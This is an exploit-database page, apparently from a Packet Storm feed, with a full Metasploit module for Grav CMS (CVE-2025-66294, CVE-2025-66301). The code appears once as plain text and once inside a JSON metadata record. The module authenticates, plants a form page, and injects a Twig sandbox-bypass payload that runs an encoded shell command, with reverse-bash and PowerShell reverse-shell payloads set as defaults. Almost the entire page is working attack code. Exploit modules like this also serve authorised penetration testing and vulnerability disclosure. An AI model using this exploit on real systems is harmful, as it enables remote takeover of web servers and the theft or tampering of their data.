📄 Grav CMS Twig SSTI Authenticated Sandbox Bypass Remote Code...

9.6 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Description

This Metasploit module exploits a Server-Side Template Injection SSTI vulnerability CVE-2025-66294 in Grav CMS that allows bypassing the Twig sandbox to achieve remote code execution. The cleanDangerousTwig method uses weak regex that fails to sanitize...

Visit Original Source

Basic Information

ID PACKETSTORM:212777

Published Dec 12, 2025 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Grav CMS Twig SSTI Authenticated Sandbox Bypass RCE',
'Description' => %q{
This module exploits a Server-Side Template Injection (SSTI)
vulnerability (CVE-2025-66294) in Grav CMS that allows bypassing the
Twig sandbox to achieve remote code execution. The cleanDangerousTwig
method uses weak regex that fails to sanitize nested Twig calls within
the evaluate_twig function. To inject the payload, this module leverages
CVE-2025-66301, a broken access control flaw that allows users with page
editing privileges to modify the form's YAML frontmatter process section.
},
'License' => MSF_LICENSE,
'Author' => [
'Tarek Nakkouch'
],
'References' => [
['CVE', '2025-66294'],
['URL', 'https://github.com/advisories/GHSA-662m-56v4-3r8f'],
['CVE', '2025-66301'],
['URL', 'https://github.com/advisories/GHSA-v8x2-fjv7-8hjh']
],
'DisclosureDate' => '2025-12-01',
'Platform' => ['unix', 'linux', 'win'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Targets' => [
[
'Unix/Linux Command Shell',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Base path to Grav CMS', '/']),
OptString.new('USERNAME', [true, 'Grav CMS username']),
OptString.new('PASSWORD', [true, 'Grav CMS password']),
OptString.new('FORM_NAME', [false, 'Form page name', "form-#{Rex::Text.rand_text_alpha(8).downcase}"])
]
)
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin'),
'keep_cookies' => true
)
return CheckCode::Unknown('Connection failed') unless res

html = res.get_html_document
return CheckCode::Unknown('Could not parse HTML') unless html

# First, verify this is a Grav installation
return CheckCode::Safe('Target does not appear to be a Grav installation') unless grav_installation?(html)

# Then verify we have access to the login form
return CheckCode::Detected('Grav detected but login form not accessible') unless login_form_present?(html)

version_str = get_version_after_login
unless version_str
return CheckCode::Detected('Grav CMS detected but version could not be determined')
end

version = Rex::Version.new(version_str.gsub('-', '.'))

if version < Rex::Version.new('1.8.0.beta.27')
return CheckCode::Appears("Grav CMS #{version_str} is vulnerable")
end

CheckCode::Safe("Grav CMS #{version_str} is patched")
rescue ArgumentError
CheckCode::Detected("Grav CMS detected, version parsing failed: #{version_str}")
rescue ::Rex::ConnectionError
CheckCode::Unknown('Connection failed')
end

def exploit
@form_folder = datastore['FORM_NAME']
@form_name = "exploit-#{Rex::Text.rand_text_alpha(8).downcase}"

login
fetch_admin_nonce
create_form_page
save_form_with_payload
fetch_frontend_nonces
execute_payload
end

private

def grav_installation?(html)
# Check for Grav-specific data attributes
grav_checks = [
html.at('//*[@data-gpm-grav]'),
html.at('//*[@data-grav-field]'),
html.at('//*[@data-grav-disabled]'),
html.at('//*[@data-grav-default]')
]

grav_checks.count { |elem| !elem.nil? } >= 2
end

def login_form_present?(html)
# Check for the specific login form inputs we need
username_input = html.at('input[@name="data[username]"]')
password_input = html.at('input[@name="data[password]"]')

username_input && password_input
end

def get_version_after_login
result = authenticate
return nil unless result == :success || result == :already_authenticated

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin'),
'keep_cookies' => true
)
return nil unless res && res.code == 200

html = res.get_html_document
return nil unless html

version_elem = html.at('span.grav-version')
return nil unless version_elem

version_elem.text.strip
end

def authenticate
res = send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin'),
'keep_cookies' => true
)
return :connection_failed unless res

html = res.get_html_document
return :connection_failed unless html

nonce = html.at('input[@name="login-nonce"]/@value')
return :already_authenticated if nonce.nil? && html.at('span.grav-version')
return :connection_failed unless nonce

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin'),
'keep_cookies' => true,
'vars_post' => {
'data[username]' => datastore['USERNAME'],
'data[password]' => datastore['PASSWORD'],
'task' => 'login',
'login-nonce' => nonce.text
}
)
return :connection_failed unless res
return :login_failed unless [302, 303].include?(res.code)

:success
end

def login
print_status('Authenticating...')
result = authenticate
case result
when :already_authenticated
print_good('Already authenticated')
when :success
print_good('Login successful')
when :connection_failed
fail_with(Failure::Unreachable, 'Connection failed')
when :login_failed
fail_with(Failure::NoAccess, 'Login failed')
else
fail_with(Failure::UnexpectedReply, 'Unexpected authentication error')
end
end

def fetch_admin_nonce
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'pages'),
'keep_cookies' => true
)
fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, "Unexpected response: #{res.code}") unless res.code == 200

html = res.get_html_document
fail_with(Failure::UnexpectedReply, 'Could not parse admin page') unless html

nonce = html.at('input[@name="admin-nonce"]/@value')
fail_with(Failure::UnexpectedReply, 'Could not extract admin nonce') unless nonce

@admin_nonce = nonce.text
end

def create_form_page
print_status('Creating malicious form page...')
res = send_request_cgi!(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'pages'),
'keep_cookies' => true,
'vars_post' => {
'data[title]' => 'Contact Form',
'data[folder]' => @form_folder,
'data[route]' => '',
'data[name]' => 'form',
'data[visible]' => '',
'data[blueprint]' => '',
'task' => 'continue',
'admin-nonce' => @admin_nonce
}
)
fail_with(Failure::Unreachable, 'Connection failed') unless res

html = res.get_html_document
fail_with(Failure::UnexpectedReply, 'Could not parse form page') unless html

form_nonce = html.at('input[@name="form-nonce"]/@value')
unique_id = html.at('input[@name="__unique_form_id__"]/@value')
fail_with(Failure::UnexpectedReply, 'Could not extract form nonces') unless form_nonce && unique_id

@form_nonce = form_nonce.text
@unique_form_id = unique_id.text
end

def save_form_with_payload
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'pages', @form_folder, ':add'),
'keep_cookies' => true,
'vars_post' => {
'task' => 'save',
'data[header][title]' => 'Contact Form',
'data[content]' => 'Please submit the form',
'data[folder]' => @form_folder,
'data[route]' => '',
'data[name]' => 'form',
'data[_json][header][form]' => form_payload_json,
'_post_entries_save' => 'edit',
'__form-name__' => 'flex-pages',
'__unique_form_id__' => @unique_form_id,
'form-nonce' => @form_nonce
}
)
fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::Unknown, 'Failed to save form') unless [200, 302, 303].include?(res.code)
end

def form_payload_json
{
'name' => @form_name,
'fields' => { 'name' => { 'type' => 'text', 'label' => 'Name', 'required' => true } },
'buttons' => { 'submit' => { 'type' => 'submit', 'value' => 'Submit' } },
'process' => [{ 'message' => "{{ evaluate_twig(form.value('name')) }}" }]
}.to_json
end

def fetch_frontend_nonces
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, @form_folder),
'keep_cookies' => true
)
fail_with(Failure::Unreachable, 'Connection failed') unless res
fail_with(Failure::NotFound, 'Form page not found') unless res.code == 200

html = res.get_html_document
fail_with(Failure::UnexpectedReply, 'Could not parse frontend form') unless html

form_nonce = html.at('input[@name="form-nonce"]/@value')
unique_id = html.at('input[@name="__unique_form_id__"]/@value')
form_name = html.at('input[@name="__form-name__"]/@value')
fail_with(Failure::UnexpectedReply, 'Could not extract frontend nonces') unless form_nonce && unique_id

@frontend_nonce = form_nonce.text
@frontend_unique_id = unique_id.text
@frontend_form_name = form_name&.text || @form_name
end

def execute_payload
print_status('Triggering payload execution...')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, @form_folder),
'keep_cookies' => true,
'vars_post' => {
'data[name]' => twig_payload,
'__form-name__' => @frontend_form_name,
'__unique_form_id__' => @frontend_unique_id,
'form-nonce' => @frontend_nonce
}
}, datastore['HttpClientTimeout'])
end

def twig_payload
cmd = payload.encoded

twig_prefix = "{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }}" \
"{% set a = grav.config.set('system.twig.undefined_functions',false) %}" \
"{{ grav.twig.twig.getFunction('"
twig_suffix = "') }}"

case target['Type']
when :win_cmd
encoded_cmd = Rex::Text.encode_base64(cmd.encode('UTF-16LE'))

"#{twig_prefix}powershell -enc #{encoded_cmd}#{twig_suffix}"

else
begin
require 'zlib'
rescue LoadError => e
fail_with(Failure::Unknown, "Failed to load zlib: #{e.message}")
end
compressed = compress_deflate(cmd)

# Strip newlines from base64 to avoid breaking Twig syntax
encoded_cmd = Rex::Text.encode_base64(compressed, '')

"#{twig_prefix}php -r \"echo gzinflate(base64_decode(\\'#{encoded_cmd}\\'));\" | sh#{twig_suffix}"
end
end

def compress_deflate(data)
deflater = Zlib::Deflate.new(Zlib::BEST_COMPRESSION, -Zlib::MAX_WBITS)
compressed = deflater.deflate(data, Zlib::FINISH)
deflater.close
compressed
end
end

{
    "lastseen": "2025-12-12T17:14:07",
    "description": "This Metasploit module exploits a Server-Side Template Injection SSTI vulnerability CVE-2025-66294 in Grav CMS that allows bypassing the Twig sandbox to achieve remote code execution. The cleanDangerousTwig method uses weak regex that fails to sanitize...",
    "published": "2025-12-12T00:00:00",
    "modified": "2025-12-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Grav CMS Twig SSTI Authenticated Sandbox Bypass Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212777",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-66294",
        "CVE-2025-66301"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Grav CMS Twig SSTI Authenticated Sandbox Bypass RCE',\n            'Description' => %q{\n              This module exploits a Server-Side Template Injection (SSTI)\n              vulnerability (CVE-2025-66294) in Grav CMS that allows bypassing the\n              Twig sandbox to achieve remote code execution. The cleanDangerousTwig\n              method uses weak regex that fails to sanitize nested Twig calls within\n              the evaluate_twig function. To inject the payload, this module leverages\n              CVE-2025-66301, a broken access control flaw that allows users with page\n              editing privileges to modify the form's YAML frontmatter process section.\n            },\n            'License' => MSF_LICENSE,\n            'Author' => [\n              'Tarek Nakkouch'\n            ],\n            'References' => [\n              ['CVE', '2025-66294'],\n              ['URL', 'https://github.com/advisories/GHSA-662m-56v4-3r8f'],\n              ['CVE', '2025-66301'],\n              ['URL', 'https://github.com/advisories/GHSA-v8x2-fjv7-8hjh']\n            ],\n            'DisclosureDate' => '2025-12-01',\n            'Platform' => ['unix', 'linux', 'win'],\n            'Arch' => ARCH_CMD,\n            'Privileged' => false,\n            'Targets' => [\n              [\n                'Unix/Linux Command Shell',\n                {\n                  'Platform' => ['unix', 'linux'],\n                  'Arch' => ARCH_CMD,\n                  'Type' => :unix_cmd,\n                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n                }\n              ],\n              [\n                'Windows Command Shell',\n                {\n                  'Platform' => 'win',\n                  'Arch' => ARCH_CMD,\n                  'Type' => :win_cmd,\n                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }\n                }\n              ]\n            ],\n            'DefaultTarget' => 0,\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS]\n            }\n          )\n        )\n        register_options(\n          [\n            Opt::RPORT(80),\n            OptString.new('TARGETURI', [true, 'Base path to Grav CMS', '/']),\n            OptString.new('USERNAME', [true, 'Grav CMS username']),\n            OptString.new('PASSWORD', [true, 'Grav CMS password']),\n            OptString.new('FORM_NAME', [false, 'Form page name', \"form-#{Rex::Text.rand_text_alpha(8).downcase}\"])\n          ]\n        )\n      end\n    \n      def check\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'admin'),\n          'keep_cookies' => true\n        )\n        return CheckCode::Unknown('Connection failed') unless res\n    \n        html = res.get_html_document\n        return CheckCode::Unknown('Could not parse HTML') unless html\n    \n        # First, verify this is a Grav installation\n        return CheckCode::Safe('Target does not appear to be a Grav installation') unless grav_installation?(html)\n    \n        # Then verify we have access to the login form\n        return CheckCode::Detected('Grav detected but login form not accessible') unless login_form_present?(html)\n    \n        version_str = get_version_after_login\n        unless version_str\n          return CheckCode::Detected('Grav CMS detected but version could not be determined')\n        end\n    \n        version = Rex::Version.new(version_str.gsub('-', '.'))\n    \n        if version < Rex::Version.new('1.8.0.beta.27')\n          return CheckCode::Appears(\"Grav CMS #{version_str} is vulnerable\")\n        end\n    \n        CheckCode::Safe(\"Grav CMS #{version_str} is patched\")\n      rescue ArgumentError\n        CheckCode::Detected(\"Grav CMS detected, version parsing failed: #{version_str}\")\n      rescue ::Rex::ConnectionError\n        CheckCode::Unknown('Connection failed')\n      end\n    \n      def exploit\n        @form_folder = datastore['FORM_NAME']\n        @form_name = \"exploit-#{Rex::Text.rand_text_alpha(8).downcase}\"\n    \n        login\n        fetch_admin_nonce\n        create_form_page\n        save_form_with_payload\n        fetch_frontend_nonces\n        execute_payload\n      end\n    \n      private\n    \n      def grav_installation?(html)\n        # Check for Grav-specific data attributes\n        grav_checks = [\n          html.at('//*[@data-gpm-grav]'),\n          html.at('//*[@data-grav-field]'),\n          html.at('//*[@data-grav-disabled]'),\n          html.at('//*[@data-grav-default]')\n        ]\n    \n        grav_checks.count { |elem| !elem.nil? } >= 2\n      end\n    \n      def login_form_present?(html)\n        # Check for the specific login form inputs we need\n        username_input = html.at('input[@name=\"data[username]\"]')\n        password_input = html.at('input[@name=\"data[password]\"]')\n    \n        username_input && password_input\n      end\n    \n      def get_version_after_login\n        result = authenticate\n        return nil unless result == :success || result == :already_authenticated\n    \n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'admin'),\n          'keep_cookies' => true\n        )\n        return nil unless res && res.code == 200\n    \n        html = res.get_html_document\n        return nil unless html\n    \n        version_elem = html.at('span.grav-version')\n        return nil unless version_elem\n    \n        version_elem.text.strip\n      end\n    \n      def authenticate\n        res = send_request_cgi!(\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'admin'),\n          'keep_cookies' => true\n        )\n        return :connection_failed unless res\n    \n        html = res.get_html_document\n        return :connection_failed unless html\n    \n        nonce = html.at('input[@name=\"login-nonce\"]/@value')\n        return :already_authenticated if nonce.nil? && html.at('span.grav-version')\n        return :connection_failed unless nonce\n    \n        res = send_request_cgi(\n          'method' => 'POST',\n          'uri' => normalize_uri(target_uri.path, 'admin'),\n          'keep_cookies' => true,\n          'vars_post' => {\n            'data[username]' => datastore['USERNAME'],\n            'data[password]' => datastore['PASSWORD'],\n            'task' => 'login',\n            'login-nonce' => nonce.text\n          }\n        )\n        return :connection_failed unless res\n        return :login_failed unless [302, 303].include?(res.code)\n    \n        :success\n      end\n    \n      def login\n        print_status('Authenticating...')\n        result = authenticate\n        case result\n        when :already_authenticated\n          print_good('Already authenticated')\n        when :success\n          print_good('Login successful')\n        when :connection_failed\n          fail_with(Failure::Unreachable, 'Connection failed')\n        when :login_failed\n          fail_with(Failure::NoAccess, 'Login failed')\n        else\n          fail_with(Failure::UnexpectedReply, 'Unexpected authentication error')\n        end\n      end\n    \n      def fetch_admin_nonce\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'admin', 'pages'),\n          'keep_cookies' => true\n        )\n        fail_with(Failure::Unreachable, 'Connection failed') unless res\n        fail_with(Failure::UnexpectedReply, \"Unexpected response: #{res.code}\") unless res.code == 200\n    \n        html = res.get_html_document\n        fail_with(Failure::UnexpectedReply, 'Could not parse admin page') unless html\n    \n        nonce = html.at('input[@name=\"admin-nonce\"]/@value')\n        fail_with(Failure::UnexpectedReply, 'Could not extract admin nonce') unless nonce\n    \n        @admin_nonce = nonce.text\n      end\n    \n      def create_form_page\n        print_status('Creating malicious form page...')\n        res = send_request_cgi!(\n          'method' => 'POST',\n          'uri' => normalize_uri(target_uri.path, 'admin', 'pages'),\n          'keep_cookies' => true,\n          'vars_post' => {\n            'data[title]' => 'Contact Form',\n            'data[folder]' => @form_folder,\n            'data[route]' => '',\n            'data[name]' => 'form',\n            'data[visible]' => '',\n            'data[blueprint]' => '',\n            'task' => 'continue',\n            'admin-nonce' => @admin_nonce\n          }\n        )\n        fail_with(Failure::Unreachable, 'Connection failed') unless res\n    \n        html = res.get_html_document\n        fail_with(Failure::UnexpectedReply, 'Could not parse form page') unless html\n    \n        form_nonce = html.at('input[@name=\"form-nonce\"]/@value')\n        unique_id = html.at('input[@name=\"__unique_form_id__\"]/@value')\n        fail_with(Failure::UnexpectedReply, 'Could not extract form nonces') unless form_nonce && unique_id\n    \n        @form_nonce = form_nonce.text\n        @unique_form_id = unique_id.text\n      end\n    \n      def save_form_with_payload\n        res = send_request_cgi(\n          'method' => 'POST',\n          'uri' => normalize_uri(target_uri.path, 'admin', 'pages', @form_folder, ':add'),\n          'keep_cookies' => true,\n          'vars_post' => {\n            'task' => 'save',\n            'data[header][title]' => 'Contact Form',\n            'data[content]' => 'Please submit the form',\n            'data[folder]' => @form_folder,\n            'data[route]' => '',\n            'data[name]' => 'form',\n            'data[_json][header][form]' => form_payload_json,\n            '_post_entries_save' => 'edit',\n            '__form-name__' => 'flex-pages',\n            '__unique_form_id__' => @unique_form_id,\n            'form-nonce' => @form_nonce\n          }\n        )\n        fail_with(Failure::Unreachable, 'Connection failed') unless res\n        fail_with(Failure::Unknown, 'Failed to save form') unless [200, 302, 303].include?(res.code)\n      end\n    \n      def form_payload_json\n        {\n          'name' => @form_name,\n          'fields' => { 'name' => { 'type' => 'text', 'label' => 'Name', 'required' => true } },\n          'buttons' => { 'submit' => { 'type' => 'submit', 'value' => 'Submit' } },\n          'process' => [{ 'message' => \"{{ evaluate_twig(form.value('name')) }}\" }]\n        }.to_json\n      end\n    \n      def fetch_frontend_nonces\n        res = send_request_cgi(\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, @form_folder),\n          'keep_cookies' => true\n        )\n        fail_with(Failure::Unreachable, 'Connection failed') unless res\n        fail_with(Failure::NotFound, 'Form page not found') unless res.code == 200\n    \n        html = res.get_html_document\n        fail_with(Failure::UnexpectedReply, 'Could not parse frontend form') unless html\n    \n        form_nonce = html.at('input[@name=\"form-nonce\"]/@value')\n        unique_id = html.at('input[@name=\"__unique_form_id__\"]/@value')\n        form_name = html.at('input[@name=\"__form-name__\"]/@value')\n        fail_with(Failure::UnexpectedReply, 'Could not extract frontend nonces') unless form_nonce && unique_id\n    \n        @frontend_nonce = form_nonce.text\n        @frontend_unique_id = unique_id.text\n        @frontend_form_name = form_name&.text || @form_name\n      end\n    \n      def execute_payload\n        print_status('Triggering payload execution...')\n        send_request_cgi({\n          'method' => 'POST',\n          'uri' => normalize_uri(target_uri.path, @form_folder),\n          'keep_cookies' => true,\n          'vars_post' => {\n            'data[name]' => twig_payload,\n            '__form-name__' => @frontend_form_name,\n            '__unique_form_id__' => @frontend_unique_id,\n            'form-nonce' => @frontend_nonce\n          }\n        }, datastore['HttpClientTimeout'])\n      end\n    \n      def twig_payload\n        cmd = payload.encoded\n    \n        twig_prefix = \"{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }}\" \\\n                      \"{% set a = grav.config.set('system.twig.undefined_functions',false) %}\" \\\n                      \"{{ grav.twig.twig.getFunction('\"\n        twig_suffix = \"') }}\"\n    \n        case target['Type']\n        when :win_cmd\n          encoded_cmd = Rex::Text.encode_base64(cmd.encode('UTF-16LE'))\n    \n          \"#{twig_prefix}powershell -enc #{encoded_cmd}#{twig_suffix}\"\n    \n        else\n          begin\n            require 'zlib'\n          rescue LoadError => e\n            fail_with(Failure::Unknown, \"Failed to load zlib: #{e.message}\")\n          end\n          compressed = compress_deflate(cmd)\n    \n          # Strip newlines from base64 to avoid breaking Twig syntax\n          encoded_cmd = Rex::Text.encode_base64(compressed, '')\n    \n          \"#{twig_prefix}php -r \\\"echo gzinflate(base64_decode(\\\\'#{encoded_cmd}\\\\'));\\\" | sh#{twig_suffix}\"\n        end\n      end\n    \n      def compress_deflate(data)\n        deflater = Zlib::Deflate.new(Zlib::BEST_COMPRESSION, -Zlib::MAX_WBITS)\n        compressed = deflater.deflate(data, Zlib::FINISH)\n        deflater.close\n        compressed\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/212777",
    "cvss": {
        "score": 9.6,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212777/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Grav CMS Twig SSTI Authenticated Sandbox Bypass Remote Code Execution_PACKETSTORM:212777

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply